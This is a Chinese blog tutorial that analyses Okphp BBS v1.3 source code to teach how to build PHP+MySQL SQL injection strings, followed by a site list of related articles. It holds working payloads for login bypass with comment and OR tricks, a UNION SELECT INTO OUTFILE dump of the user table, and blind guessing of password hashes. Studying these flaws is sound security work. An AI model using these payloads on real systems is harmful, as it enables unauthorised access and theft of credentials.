php 攻击方法之谈php+mysql注射语句构造


Posted in PHP onOctober 30, 2009

一.前言:

版本信息:Okphp BBS v1.3 开源版

由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。

声明:文章所有提到的“漏洞”,都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。

二.“漏洞”分析:

1.admin/login.php注射导致绕过身份验证漏洞:

代码:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname); 

$password = md5($password); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中


$username 和 $password 没过滤, 很容易就绕过。

对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有:

构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a

相当于sql语句:

select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'

构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*)

即:

select * from $user_table where username='admin'#' and password='$password'"

相当于:

select * from $user_table where username='admin'

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:

select id,group_id from $user_table where username='admin'#' and password='$password'"

相当于:

select id,group_id from $user_table where username='admin'

只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,

我们就可以这样构造:$username=' OR id=1#

相当于:

select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉)

我们接着往下看代码:

if ($row[0]) { 

// If not admin or super moderator 

if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { 

$login = 0; 

} 

else { 

$login = 1; 

} 

} 

// Fail to login--------------- 

if (!$login) { 

write_log("Moderator login","0","password wrong"); 

echo " "; 

exit(); 

} 

// Access ! ------------- 

else { 

session_start();

最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。

2.users/login.php注射导致绕过身份验证漏洞:

代码:

$md5password = md5($password); 

$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res);

$username没过滤利用同1里注释掉and password='$md5password'";

3.admin\log\list.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下)

okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码:

$arr = array("del_log","log_id","del_id"); 

get_r($arr); 

// 

if ($del_log) { 

省略........ 

if ($log_id) { 

foreach ($log_id as $val) { 

$q = "delete from $log_table where id='$val'"; 

$res = sql_query($q,$conn); 

if ($res) { 

$i++; 

} 

} 

} 

elseif ($del_id) { 

$q = "delete from $log_table where id='$del_id'"; 

$res = sql_query($q,$conn); 

} 

$tpl->setVariable("message","$i log deleted ok!"); 

$tpl->setVariable("action","index.php?action=list_log"); 

}

代码就只简单的用get_r($arr);判断的提交的参数,我们只要提交相应的$del_log,$log_id,$del_id。就回删除成功。

4.多个文件对变量没有过滤导致sql注射漏洞。

okphp的作者好象都不喜欢过滤:)。基本上所有的sql语句中的变量都是“赤裸裸”的。具体那些文件我就不列出来了,请自己看代码,我这里就用\forums\list_threads.php为例子简单谈一下。

看list_threads.php的代码:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res);

变量$forum_id没有过滤,因为mysql不支持子查询,我们可以利用union构造语句进行联合查询(要求MySQL版本在4.00以上)实现跨库操作,我们构造如下:

构造1:利用 SELECT * FROM table INTO OUTFILE '/path/file.txt'(要求mysql有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id:

$forum_id=' union select * from user_table into outfile '/path/file.txt'

以下:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";

上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使mysql报错而得到),而且php的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过:

构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。

5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。)

问题代码同漏洞1。

语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了):

$username=admin' AND LENGTH(password)=6#

sql语句变成:

$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"

相当于:

$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"

如果LENGTH(password)=6成立,则正常返回,如果不成立,mysql就会报错。

这样我们就可以猜解用户admin密码hash了。如$username=admin' ord(substring(password,1,1))=57#

可以猜用户的密码第一位的ascii码值............。

PHP 相关文章推荐
php var_export与var_dump 输出的不同
Aug 09 PHP
php登陆页的密码处理方式分享
Oct 14 PHP
php实现读取手机客户端浏览器的类
Jan 09 PHP
PHP扩展开发入门教程
Feb 26 PHP
PHP正则表达式过滤html标签属性(DEMO)
May 04 PHP
PHP查看SSL证书信息的方法
Sep 22 PHP
php实现的XML操作(读取)封装类完整实例
Feb 23 PHP
Yii2框架实现登陆添加验证码功能示例
Jul 12 PHP
CentOS7编译安装php7.1的教程详解
Apr 18 PHP
PHP文件上传小程序 适合初学者学习!
May 23 PHP
PHP 枚举类型的管理与设计知识点总结
Feb 13 PHP
Laravel统一错误处理为JSON的方法介绍
Oct 18 PHP
PHP 文件上传源码分析(RFC1867)
Oct 30 #PHP
浅谈PHP 闭包特性在实际应用中的问题
Oct 30 #PHP
php实现jQuery扩展函数
Oct 30 #PHP
PHP 读取和修改大文件的某行内容的代码
Oct 30 #PHP
PHP 批量删除数据的方法分析
Oct 30 #PHP
ThinkPHP php 框架学习笔记
Oct 30 #PHP
php pack与unpack 摸板字符字符含义
Oct 29 #PHP
You might like
2019十大人气国漫
2020/03/13 国漫
PHP命名空间(Namespace)简明教程
2014/06/11 PHP
使用CodeIgniter的类库做图片上传
2014/06/12 PHP
PHP和C#可共用的可逆加密算法详解
2015/10/26 PHP
CodeIgniter配置之database.php用法实例分析
2016/01/20 PHP
PHP模拟http请求的方法详解
2016/11/09 PHP
PHP实现防止表单重复提交功能【基于token验证】
2018/05/24 PHP
PHP使用SMTP邮件服务器发送邮件示例
2018/08/28 PHP
Jquery 基础学习笔记之文档处理
2009/05/29 Javascript
DOM 脚本编程中的兄弟节点
2009/10/31 Javascript
jQuery UI Dialog控件中的表单无法正常提交的解决方法
2010/12/19 Javascript
jQuery源码分析-02正则表达式 RegExp 常用正则表达式
2011/11/14 Javascript
JS中Date日期函数中的参数使用介绍
2014/01/02 Javascript
使用npm发布Node.JS程序包教程
2015/03/02 Javascript
Angularjs注入拦截器实现Loading效果
2015/12/28 Javascript
jQuery插件imgPreviewQs实现上传图片预览
2016/01/15 Javascript
jQuery计算文本框字数及限制文本框字数的方法
2016/03/01 Javascript
Node.js服务器环境下使用Mock.js拦截AJAX请求的教程
2016/05/23 Javascript
用jmSlip编写移动端顶部日历选择控件
2016/10/24 Javascript
vue2.0实现前端星星评分功能组件实例代码
2018/02/12 Javascript
vue用递归组件写树形控件的实例代码
2018/07/19 Javascript
vue双击事件2.0事件监听(点击-双击-鼠标事件)和事件修饰符操作
2020/07/27 Javascript
[02:46]解说DC:感谢430陪伴我们的DOTA2国际邀请赛岁月
2016/06/29 DOTA
Python中获取网页状态码的两个方法
2014/11/03 Python
django认证系统实现自定义权限管理的方法
2019/08/28 Python
Python3 翻转二叉树的实现
2019/09/30 Python
详解mac python+selenium+Chrome 简单案例
2019/11/08 Python
一文了解python 3 字符串格式化 F-string 用法
2020/03/04 Python
浅谈Django前端后端值传递问题
2020/07/15 Python
Python configparser模块应用过程解析
2020/08/14 Python
Python实现哲学家就餐问题实例代码
2020/11/09 Python
天猫超市:阿里巴巴打造的网上超市
2016/11/02 全球购物
舞蹈兴趣小组活动总结
2014/07/07 职场文书
工作作风懒散检讨书
2014/10/29 职场文书
晚会开幕词范文
2016/03/04 职场文书
JS ES6异步解决方案
2021/04/29 Javascript